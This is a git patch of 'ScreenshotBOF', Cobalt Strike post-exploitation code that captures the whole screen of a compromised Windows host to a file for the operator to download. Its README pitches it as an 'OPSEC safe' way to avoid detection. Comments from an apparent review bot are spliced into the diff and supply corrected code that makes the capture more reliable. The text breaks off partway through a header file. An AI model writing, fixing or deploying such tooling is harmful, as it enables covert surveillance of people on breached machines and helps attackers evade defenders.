From a32d08289530f14815adec040ce527363a5a8912 Mon Sep 17 00:00:00 2001 
From: CodeXTF2 Date: Sun, 23 Oct 2022 16:58:24 +0800 Subject: [PATCH] first commit --- .gitignore | 1 + README.md | 21 + ScreenshotBOF.sln | 37 ++ ScreenshotBOF/ScreenshotBOF.vcxproj | 277 ++++++++++++++ ScreenshotBOF/ScreenshotBOF.vcxproj.filters | 32 ++ ScreenshotBOF/ScreenshotBOF.vcxproj.user | 4 + ScreenshotBOF/Source.cpp | 151 ++++++++ ScreenshotBOF/beacon.h | 63 +++ ScreenshotBOF/bofdefs.h | 361 ++++++++++++++++++ .../intermediary/BOF/x64/ScreenshotBOF.log | 23 ++ .../x64/ScreenshotBOF.tlog/CL.command.1.tlog | Bin 0 -> 622 bytes .../BOF/x64/ScreenshotBOF.tlog/CL.read.1.tlog | Bin 0 -> 26542 bytes .../x64/ScreenshotBOF.tlog/CL.write.1.tlog | Bin 0 -> 498 bytes .../ScreenshotBOF.lastbuildstate | 2 + ...ScreenshotBOF.vcxproj.FileListAbsolute.txt | 0 .../x64/ScreenshotBOFx64.Build.CppClean.log | 5 + .../BOF/x64/ScreenshotBOFx64.recipe | 7 + ScreenshotBOF/intermediary/BOF/x64/source.obj | Bin 0 -> 5239 bytes .../intermediary/BOF/x86/ScreenshotBOF.log | 23 ++ .../x86/ScreenshotBOF.tlog/CL.command.1.tlog | Bin 0 -> 652 bytes .../BOF/x86/ScreenshotBOF.tlog/CL.read.1.tlog | Bin 0 -> 26542 bytes .../x86/ScreenshotBOF.tlog/CL.write.1.tlog | Bin 0 -> 498 bytes .../ScreenshotBOF.lastbuildstate | 2 + ...ScreenshotBOF.vcxproj.FileListAbsolute.txt | 0 .../x86/ScreenshotBOFx32.Build.CppClean.log | 5 + .../BOF/x86/ScreenshotBOFx32.recipe | 7 + ScreenshotBOF/intermediary/BOF/x86/source.obj | Bin 0 -> 4153 bytes ScreenshotBOF/resources/strip_bof.ps1 | 127 ++++++ bin/BOF/ScreenshotBOF.x64.obj | Bin 0 -> 5239 bytes bin/BOF/ScreenshotBOF.x86.obj | Bin 0 -> 4153 bytes bin/BOF/screenshotBOF.cna | 21 + 31 files changed, 1169 insertions(+) create mode 100644 .gitignore create mode 100644 README.md create mode 100644 ScreenshotBOF.sln create mode 100644 ScreenshotBOF/ScreenshotBOF.vcxproj create mode 100644 ScreenshotBOF/ScreenshotBOF.vcxproj.filters create mode 100644 ScreenshotBOF/ScreenshotBOF.vcxproj.user create mode 100644 ScreenshotBOF/Source.cpp create mode 100644 
ScreenshotBOF/beacon.h create mode 100644 ScreenshotBOF/bofdefs.h create mode 100644 ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log create mode 100644 ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.command.1.tlog create mode 100644 ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.read.1.tlog create mode 100644 ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.write.1.tlog create mode 100644 ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate create mode 100644 ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.vcxproj.FileListAbsolute.txt create mode 100644 ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.Build.CppClean.log create mode 100644 ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.recipe create mode 100644 ScreenshotBOF/intermediary/BOF/x64/source.obj create mode 100644 ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.log create mode 100644 ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.command.1.tlog create mode 100644 ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.read.1.tlog create mode 100644 ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.write.1.tlog create mode 100644 ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate create mode 100644 ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.vcxproj.FileListAbsolute.txt create mode 100644 ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.Build.CppClean.log create mode 100644 ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.recipe create mode 100644 ScreenshotBOF/intermediary/BOF/x86/source.obj create mode 100644 ScreenshotBOF/resources/strip_bof.ps1 create mode 100644 bin/BOF/ScreenshotBOF.x64.obj create mode 100644 bin/BOF/ScreenshotBOF.x86.obj create mode 100644 bin/BOF/screenshotBOF.cna diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..b66ae99 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +/.vs \ No newline at end of file 
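Review bot: The new `.gitignore` excludes only `/.vs`, yet this same commit adds the whole `ScreenshotBOF/intermediary/**` tree (`.tlog`, `.log`, `source.obj`) and those build logs embed the developer's local path `C:\Users\Ethan\...`, which leaks a username into a public repository; I'd add `intermediary/`, `*.tlog` and `*.log` here next to `/.vs`. The `ScreenshotBOF.vcxproj.user` file is per-developer and is normally ignored as well. The prebuilt `bin/BOF/*.obj` that `screenshotBOF.cna` loads are also committed as opaque binaries; if they are meant to stay in the repo, the README should state how to rebuild them from source so an operator can verify that the object file matches the code before executing it inside a Beacon.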
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..391a2fd
--- /dev/null
+++ b/README.md
@@ -0,0 +1,21 @@
+# ScreenshotBOF
+
+An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot saved to disk as a file.
+
+## Usage
+1. import the screenshotBOF.cna script into Cobalt Strike
+2. use the command screenshot_bof
+3. Download the screenshot from the target e.g.
+```
+download screenshot.bmp
+```
+
+## Notes
+- no evasion is performed, which should be fine since the WinAPIs used are not malicious
+- in memory downloading of screenshots is planned to be added
+- the filename can be changed in the source code.
+
+## Why did I make this?
+Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command.
+While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more
+OPSEC safe version of the screenshot capability.
\ No newline at end of file
diff --git a/ScreenshotBOF.sln b/ScreenshotBOF.sln
new file mode 100644
index 0000000..9997b26
--- /dev/null
+++ b/ScreenshotBOF.sln
@@ -0,0 +1,37 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 16 +VisualStudioVersion = 16.0.30517.126 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ScreenshotBOF", "ScreenshotBOF\ScreenshotBOF.vcxproj", "{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + BOF|x64 = BOF|x64 + BOF|x86 = BOF|x86 + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x64.ActiveCfg = BOF|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x64.Build.0 = BOF|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x86.ActiveCfg = BOF|Win32 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x86.Build.0 = BOF|Win32 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x64.ActiveCfg = Debug|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x64.Build.0 = Debug|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x86.ActiveCfg = Debug|Win32 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x86.Build.0 = Debug|Win32 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x64.ActiveCfg = Release|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x64.Build.0 = Release|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x86.ActiveCfg = Release|Win32 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {BB40A5A4-261A-4411-8CC0-615E484001A5} + EndGlobalSection +EndGlobal diff --git a/ScreenshotBOF/ScreenshotBOF.vcxproj b/ScreenshotBOF/ScreenshotBOF.vcxproj new file mode 100644 index 0000000..95c3510 --- /dev/null +++ b/ScreenshotBOF/ScreenshotBOF.vcxproj 
@@ -0,0 +1,277 @@ + + + + + BOF + Win32 + + + Debug + Win32 + + + Release + Win32 + + + BOF + x64 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {c04ab0f3-f7e1-4996-9cfa-d1337332ef29} + ScreenshotBOF + 10.0 + ScreenshotBOF + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + v142 + Console + + + + + Console + + v142 + + + + + + + + + + + + + + + + + + + + + + + $(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.obj;*.cdf;*.cache;*.obj;*.obj.enc;*.ilk;*.ipdb;*.iobj;*.resources;*.tlb;*.tli;*.tlh;*.tmp;*.rsp;*.pgc;*.pgd;*.meta;*.tlog;*.manifest;*.res;*.pch;*.exp;*.idb;*.rep;*.xdc;*.pdb;*_manifest.rc;*.bsc;*.sbr;*.xml;*.metagen;*.bi;$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.o;$(ExtensionsToDeleteOnClean) + + $(SolutionDir)bin\$(Configuration)\ + intermediary\$(Configuration)\$(Platform)\ + $(ProjectName)x64 + + + $(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.obj;*.cdf;*.cache;*.obj;*.obj.enc;*.ilk;*.ipdb;*.iobj;*.resources;*.tlb;*.tli;*.tlh;*.tmp;*.rsp;*.pgc;*.pgd;*.meta;*.tlog;*.manifest;*.res;*.pch;*.exp;*.idb;*.rep;*.xdc;*.pdb;*_manifest.rc;*.bsc;*.sbr;*.xml;*.metagen;*.bi;$(ExtensionsToDeleteOnClean) + + $(SolutionDir)bin\$(Configuration)\ + $(ProjectName)x32 + intermediary\$(Configuration)\x86\ + + + $(SolutionDir)bin\$(Configuration)\ + $(ProjectName)64 + + + $(SolutionDir)bin\$(Configuration)\ + $(ProjectName)32 + + + $(SolutionDir)bin\$(Configuration)\ + $(ProjectName)32 + + + $(SolutionDir)bin\$(Configuration)\ + $(ProjectName)64 + + + + EnableAllWarnings + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + false + + + Level1 + + + Console + true + + + + + Level4 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + false + Level1 + + + + + Console + true + true + true + + + + + EnableAllWarnings + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + false + 
true + Level1 + + + Console + true + + + + + Level4 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + false + Level1 + + + Console + true + true + true + + + + + /c /Fo"intermediary\BOF\x64\source" + + + None + false + BOF;%(PreprocessorDefinitions) + + + + + + + + + + + + + + + + + + + + + + + + Level1 + + + xcopy /y "$(SolutionDir)$(ProjectName)\intermediary\$(Configuration)\$(Platform)\source.obj" "$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.o*"; +powershell -ExecutionPolicy Unrestricted -command "& { . '$(SolutionDir)$(ProjectName)\resources\strip_bof.ps1'; strip-bof -Path '$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.obj' }" + + + + + /c /Fo"intermediary\BOF\x86\source" + + + None + false + BOF;%(PreprocessorDefinitions) + + + + + + + + + + + + + + + + + + + + + Level1 + + + xcopy /y "$(SolutionDir)$(ProjectName)\intermediary\$(Configuration)\x86\source.obj" "$(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.o*"; + powershell -ExecutionPolicy Unrestricted -command "& { . '$(SolutionDir)$(ProjectName)\resources\strip_bof.ps1'; strip-bof -Path '$(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.obj' }" + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/ScreenshotBOF/ScreenshotBOF.vcxproj.filters b/ScreenshotBOF/ScreenshotBOF.vcxproj.filters new file mode 100644 index 0000000..582dd13 --- /dev/null +++ b/ScreenshotBOF/ScreenshotBOF.vcxproj.filters @@ -0,0 +1,32 @@ + + + + + {f23d5754-25e5-46a9-b783-8685f48d2291} + + + {72263c50-a87a-4d99-9746-3def65c61180} + + + {999efb6a-e35d-49fb-bf81-1ebab5077dd0} + + + + + Source Files + + + + + Header Files + + + Header Files + + + + + Resources + + + \ No newline at end of file diff --git a/ScreenshotBOF/ScreenshotBOF.vcxproj.user b/ScreenshotBOF/ScreenshotBOF.vcxproj.user new file mode 100644 index 0000000..88a5509 --- /dev/null +++ b/ScreenshotBOF/ScreenshotBOF.vcxproj.user @@ -0,0 +1,4 @@ + + + + \ No newline at end of file 
diff --git a/ScreenshotBOF/Source.cpp b/ScreenshotBOF/Source.cpp
new file mode 100644
index 0000000..cb6669e
--- /dev/null
+++ b/ScreenshotBOF/Source.cpp
@@ -0,0 +1,151 @@ +#include +#include +#include "bofdefs.h" +#pragma comment(lib, "User32.lib") +#pragma comment(lib, "Gdi32.lib") + + + +#pragma region error_handling +#define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr) +BOOL _print_error(char* func, int line, char* msg, HRESULT hr) { +#ifdef BOF + BeaconPrintf(CALLBACK_ERROR, "(%s at %d): %s 0x%08lx", func, line, msg, hr); +#else + printf("[-] (%s at %d): %s 0x%08lx", func, line, msg, hr); +#endif // BOF + + return FALSE; +} +#pragma endregion + + +BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName) +{ + HDC hDC; + int iBits; + WORD wBitCount; + DWORD dwPaletteSize = 0, dwBmBitsSize = 0, dwDIBSize = 0, dwWritten = 0; + BITMAP Bitmap0; + BITMAPFILEHEADER bmfHdr; + BITMAPINFOHEADER bi; + LPBITMAPINFOHEADER lpbi; + HANDLE fh, hDib, hPal, hOldPal2 = NULL; + hDC = CreateDC(TEXT("DISPLAY"), NULL, NULL, NULL); + iBits = GetDeviceCaps(hDC, BITSPIXEL) * GetDeviceCaps(hDC, PLANES); + DeleteDC(hDC); + if (iBits <= 1) + wBitCount = 1; + else if (iBits <= 4) + wBitCount = 4; + else if (iBits <= 8) + wBitCount = 8; + else + wBitCount = 24; + GetObject(hBitmap, sizeof(Bitmap0), (LPSTR)&Bitmap0); + bi.biSize = sizeof(BITMAPINFOHEADER); + bi.biWidth = Bitmap0.bmWidth; + bi.biHeight = -Bitmap0.bmHeight; + bi.biPlanes = 1; + bi.biBitCount = wBitCount; + bi.biCompression = BI_RGB; + bi.biSizeImage = 0; + bi.biXPelsPerMeter = 0; + bi.biYPelsPerMeter = 0; + bi.biClrImportant = 0; + bi.biClrUsed = 256; + dwBmBitsSize = ((Bitmap0.bmWidth * wBitCount + 31) & ~31) / 8 + * Bitmap0.bmHeight; + hDib = GlobalAlloc(GHND, dwBmBitsSize + dwPaletteSize + sizeof(BITMAPINFOHEADER)); + lpbi = (LPBITMAPINFOHEADER)GlobalLock(hDib); + *lpbi = bi; + + hPal = GetStockObject(DEFAULT_PALETTE); + if (hPal) + { + hDC = GetDC(NULL); + hOldPal2 = SelectPalette(hDC, (HPALETTE)hPal, FALSE); + RealizePalette(hDC); + } + + + GetDIBits(hDC, hBitmap, 0, (UINT)Bitmap0.bmHeight, (LPSTR)lpbi + sizeof(BITMAPINFOHEADER) + + dwPaletteSize, 
(BITMAPINFO*)lpbi, DIB_RGB_COLORS); + + if (hOldPal2) + { + SelectPalette(hDC, (HPALETTE)hOldPal2, TRUE); + RealizePalette(hDC); + ReleaseDC(NULL, hDC); + } + + fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, + FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL); + + if (fh == INVALID_HANDLE_VALUE) + return FALSE; + + bmfHdr.bfType = 0x4D42; // "BM" + dwDIBSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize; + bmfHdr.bfSize = dwDIBSize; + bmfHdr.bfReserved1 = 0; + bmfHdr.bfReserved2 = 0; + bmfHdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER) + dwPaletteSize; + + WriteFile(fh, (LPSTR)&bmfHdr, sizeof(BITMAPFILEHEADER), &dwWritten, NULL); + + WriteFile(fh, (LPSTR)lpbi, dwDIBSize, &dwWritten, NULL); + GlobalUnlock(hDib); + GlobalFree(hDib); + CloseHandle(fh); + return TRUE; +} + +#ifdef BOF +void go(char* buff, int len) { + BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to disk"); + int x1, y1, x2, y2, w, h; + // get screen dimensions + x1 = GetSystemMetrics(SM_XVIRTUALSCREEN); + y1 = GetSystemMetrics(SM_YVIRTUALSCREEN); + x2 = GetSystemMetrics(SM_CXVIRTUALSCREEN); + y2 = GetSystemMetrics(SM_CYVIRTUALSCREEN); + w = x2 - x1; + h = y2 - y1; + + // copy screen to bitmap + HDC hScreen = GetDC(NULL); + HDC hDC = CreateCompatibleDC(hScreen); + HBITMAP hBitmap = CreateCompatibleBitmap(hScreen, w, h); + HGDIOBJ old_obj = SelectObject(hDC, hBitmap); + BOOL bRet = BitBlt(hDC, 0, 0, w, h, hScreen, x1, y1, SRCCOPY); + + //I was going to pull from the clipboard but then realized it + //was more trouble than it was worth, so I just saved it to a file. 
~ CodeX + + // save bitmap to clipboard + OpenClipboard(NULL); + EmptyClipboard(); + SetClipboardData(CF_BITMAP, hBitmap); + CloseClipboard(); + + BeaconPrintf(0x0, "[+] PrintScreen saved to bitmap..."); + LPCSTR filename = "screenshot.bmp"; + SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename); + + BeaconPrintf(0x0, "[+] Printscreen bitmap saved to screenshot.bmp"); + // clean up + SelectObject(hDC, old_obj); + DeleteDC(hDC); + ReleaseDC(NULL, hScreen); + DeleteObject(hBitmap); +} + + +#else + +void main(int argc, char* argv[]) { + +} + +#endif \ No newline at end of file diff --git a/ScreenshotBOF/beacon.h b/ScreenshotBOF/beacon.h new file mode 100644 index 0000000..e70bebc --- /dev/null +++ b/ScreenshotBOF/beacon.h 
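Review bot: The second `WriteFile` in `SaveHBITMAPToFile` writes `dwDIBSize` bytes starting at `lpbi`, but `dwDIBSize` includes `sizeof(BITMAPFILEHEADER)` while `hDib` was allocated as `dwBmBitsSize + dwPaletteSize + sizeof(BITMAPINFOHEADER)`, so the call reads 14 bytes past the end of the `GlobalAlloc` block and the file on disk ends up 14 bytes longer than `bfSize` claims; the length should be `dwDIBSize - sizeof(BITMAPFILEHEADER)`. Nothing else in that function is checked either: a failed `GlobalAlloc`/`GlobalLock` dereferences NULL at `*lpbi = bi`, the `return FALSE` after `CreateFile` fails leaks `hDib`, the `GetDIBits` and `WriteFile` results are ignored so a truncated capture is still reported as saved, and if `GetStockObject` returned NULL `GetDIBits` would run on the `hDC` already destroyed by `DeleteDC`. In `go`, `bRet` from `BitBlt` is never read, and the clipboard block the comment says was abandoned still executes, wiping the logged-on user's clipboard (a user-visible side effect on an "OPSEC safe" capability) and handing `hBitmap` to the clipboard before `DeleteObject(hBitmap)` releases it — I would delete the `OpenClipboard` … `CloseClipboard` lines and bail out when `bRet` is FALSE. The `(LPCTSTR)filename` cast only holds when the BOF configuration builds without `UNICODE`; the Debug/Release configurations in the vcxproj select Unicode, so confirm the BOF configuration does not.
```cpp
    hDib = GlobalAlloc(GHND, dwBmBitsSize + dwPaletteSize + sizeof(BITMAPINFOHEADER));
    if (hDib == NULL)
        return FALSE;
    lpbi = (LPBITMAPINFOHEADER)GlobalLock(hDib);
    if (lpbi == NULL) {
        GlobalFree(hDib);
        return FALSE;
    }
    *lpbi = bi;
    // … unchanged: palette selection …
    hDC = GetDC(NULL);   // always take a live DC; the CreateDC one was deleted above
    if (hPal)
    {
        hOldPal2 = SelectPalette(hDC, (HPALETTE)hPal, FALSE);
        RealizePalette(hDC);
    }
    int lines = GetDIBits(hDC, hBitmap, 0, (UINT)Bitmap0.bmHeight, (LPSTR)lpbi + sizeof(BITMAPINFOHEADER) + dwPaletteSize,
        (BITMAPINFO*)lpbi, DIB_RGB_COLORS);
    if (hOldPal2)
    {
        SelectPalette(hDC, (HPALETTE)hOldPal2, TRUE);
        RealizePalette(hDC);
    }
    ReleaseDC(NULL, hDC);
    if (lines == 0) {
        GlobalUnlock(hDib);
        GlobalFree(hDib);
        return FALSE;
    }
    fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,
        FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL);
    if (fh == INVALID_HANDLE_VALUE) {
        GlobalUnlock(hDib);
        GlobalFree(hDib);
        return FALSE;
    }
    // … unchanged: bmfHdr population …
    BOOL ok = WriteFile(fh, (LPSTR)&bmfHdr, sizeof(BITMAPFILEHEADER), &dwWritten, NULL)
        && WriteFile(fh, (LPSTR)lpbi, dwDIBSize - sizeof(BITMAPFILEHEADER), &dwWritten, NULL);
    GlobalUnlock(hDib);
    GlobalFree(hDib);
    CloseHandle(fh);
    return ok;
```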
@@ -0,0 +1,63 @@
+#pragma once
+
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Cobalt Strike 4.1.
+ */
+
+/* data API */
+typedef struct {
+ char * original; /* the original buffer [so we can free it] */
+ char * buffer; /* current pointer into our buffer */
+ int length; /* remaining length of data */
+ int size; /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT int BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+ char * original; /* the original buffer [so we can free it] */
+ char * buffer; /* current pointer into our buffer */
+ int length; /* remaining length of data */
+ int size; /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT 0x0
+#define CALLBACK_OUTPUT_OEM 0x1e
+#define CALLBACK_ERROR 0x0d
+#define CALLBACK_OUTPUT_UTF8 0x20
+
+DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...);
+DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len);
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void BeaconRevertToken();
+DECLSPEC_IMPORT BOOL 
BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max);
diff --git a/ScreenshotBOF/bofdefs.h b/ScreenshotBOF/bofdefs.h
new file mode 100644
index 0000000..c960e31
--- /dev/null
+++ b/ScreenshotBOF/bofdefs.h
@@ -0,0 +1,361 @@ +#pragma once +/* some code and/or ideas are from trustedsec SA Github repo -- thankyou trustedsec! */ +#include + + +#ifdef BOF + +#ifdef __cplusplus +extern "C" { +#endif + +#include "beacon.h" + +void go(char* buff, int len); + +/* resolve some extra funcs for the screenshot */ + + DECLSPEC_IMPORT DWORD WINAPI User32$MessageBoxA(HWND, LPCTSTR, LPCTSTR, UINT); +#define MessageBoxCustom User32$MessageBoxA + + DECLSPEC_IMPORT int WINAPI User32$GetSystemMetrics(int nIndex); +#define GetSystemMetrics User32$GetSystemMetrics + + DECLSPEC_IMPORT HDC WINAPI User32$GetDC(HWND hWnd); +#define GetDC User32$GetDC + + DECLSPEC_IMPORT HDC WINAPI GDI32$CreateCompatibleDC(HDC hdc); +#define CreateCompatibleDC GDI32$CreateCompatibleDC + + DECLSPEC_IMPORT HBITMAP WINAPI GDI32$CreateCompatibleBitmap(HDC hdc, int cx, int cy); +#define CreateCompatibleBitmap GDI32$CreateCompatibleBitmap + + DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$SelectObject(HDC hdc, HGDIOBJ h); +#define SelectObject GDI32$SelectObject + + DECLSPEC_IMPORT BOOL WINAPI GDI32$BitBlt(HDC hdc, + int x, + int y, + int cx, + int cy, + HDC hdcSrc, + int x1, + int y1, + DWORD rop); +#define BitBlt GDI32$BitBlt + + DECLSPEC_IMPORT BOOL WINAPI User32$OpenClipboard(HWND hWndNewOwner); +#define OpenClipboard User32$OpenClipboard + + DECLSPEC_IMPORT BOOL WINAPI User32$EmptyClipboard(); +#define EmptyClipboard User32$EmptyClipboard + + DECLSPEC_IMPORT BOOL WINAPI User32$SetClipboardData(UINT uFormat, HANDLE hMem); +#define SetClipboardData User32$SetClipboardData + + DECLSPEC_IMPORT BOOL WINAPI User32$CloseClipboard(); +#define CloseClipboard User32$CloseClipboard + + DECLSPEC_IMPORT BOOL WINAPI GDI32$DeleteDC(HDC hdc); +#define DeleteDC GDI32$DeleteDC + + DECLSPEC_IMPORT int WINAPI User32$ReleaseDC(HWND hWnd, HDC hDC); +#define ReleaseDC User32$ReleaseDC + + DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$DeleteObject(HGDIOBJ ho); +#define DeleteObject GDI32$DeleteObject + + + + /* End of function resolutions for screenshot 
*/ + + /* Resolve some functions for writing BMP to disk*/ + + DECLSPEC_IMPORT HDC WINAPI GDI32$CreateDCA(LPCSTR pwszDriver, + LPCSTR pwszDevice, + LPCSTR pszPort, + const DEVMODEA* pdm); +#define CreateDCA GDI32$CreateDCA + + DECLSPEC_IMPORT int WINAPI GDI32$GetDeviceCaps(HDC hdc, + int index); +#define GetDeviceCaps GDI32$GetDeviceCaps + + DECLSPEC_IMPORT int WINAPI GDI32$GetObjectA(HANDLE h, + int c, + LPVOID pv); +#define GetObjectA GDI32$GetObjectA + DECLSPEC_IMPORT HGLOBAL WINAPI KERNEL32$GlobalAlloc( + UINT uFlags, + SIZE_T dwBytes); +#define GlobalAlloc KERNEL32$GlobalAlloc + + DECLSPEC_IMPORT WINBASEAPI LPVOID WINAPI KERNEL32$GlobalLock(HGLOBAL); +#define GlobalLock KERNEL32$GlobalLock + + DECLSPEC_IMPORT WINGDIAPI HGDIOBJ WINAPI GDI32$GetStockObject(int); +#define GetStockObject GDI32$GetStockObject + + DECLSPEC_IMPORT WINGDIAPI HPALETTE WINAPI GDI32$SelectPalette(HDC, HPALETTE, BOOL); +#define SelectPalette GDI32$SelectPalette + + DECLSPEC_IMPORT WINGDIAPI UINT WINAPI GDI32$RealizePalette(HDC); +#define RealizePalette GDI32$RealizePalette + + DECLSPEC_IMPORT WINGDIAPI int WINAPI GDI32$GetDIBits(HDC hdc, + HBITMAP hbm, + UINT start, + UINT cLines, + LPVOID lpvBits, + LPBITMAPINFO lpbmi, + UINT usage); +#define GetDIBits GDI32$GetDIBits + + DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$GlobalUnlock(HGLOBAL); +#define GlobalUnlock KERNEL32$GlobalUnlock + + DECLSPEC_IMPORT WINBASEAPI HGLOBAL WINAPI KERNEL32$GlobalFree(HGLOBAL); +#define GlobalFree KERNEL32$GlobalFree + + DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle(HANDLE); +#define CloseHandle KERNEL32$CloseHandle + + + + + /* End of function resolutions for writing BMP to disk */ + + +/* COM */ +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CLSIDFromString(LPCWSTR, LPCLSID); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID* ppv); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID, DWORD); +DECLSPEC_IMPORT 
